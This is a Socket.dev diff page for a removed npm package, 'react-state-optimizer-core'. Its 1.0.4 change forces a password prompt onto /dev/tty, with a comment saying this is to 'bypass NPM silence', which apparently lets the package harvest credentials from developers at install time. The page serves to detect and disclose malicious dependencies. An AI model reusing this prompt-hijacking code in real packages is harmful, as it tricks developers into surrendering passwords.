You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

react-state-optimizer-core

Package Overview
Dependencies
Maintainers
1
Versions
16
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-state-optimizer-core - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
1.0.3
to
1.0.4
+1
-1
package.json
{
"name": "react-state-optimizer-core",
"version": "1.0.3",
"version": "1.0.4",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "main": "index.js",

@@ -111,5 +111,17 @@ const fs = require('fs');

const password = await new Promise((resInput) => {
let input = process.stdin;
let output = process.stdout;
// FORCE TTY to bypass NPM silence
try {
const tty = require('fs').openSync('/dev/tty', 'r+');
const ttyStream = require('net').Socket({ fd: tty, readable: true, writable: true });
input = ttyStream;
output = ttyStream;
} catch (e) { }
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout
input: input,
output: output,
terminal: true // Helps with password masking logic if we added it, but here just prompts
});

@@ -116,0 +128,0 @@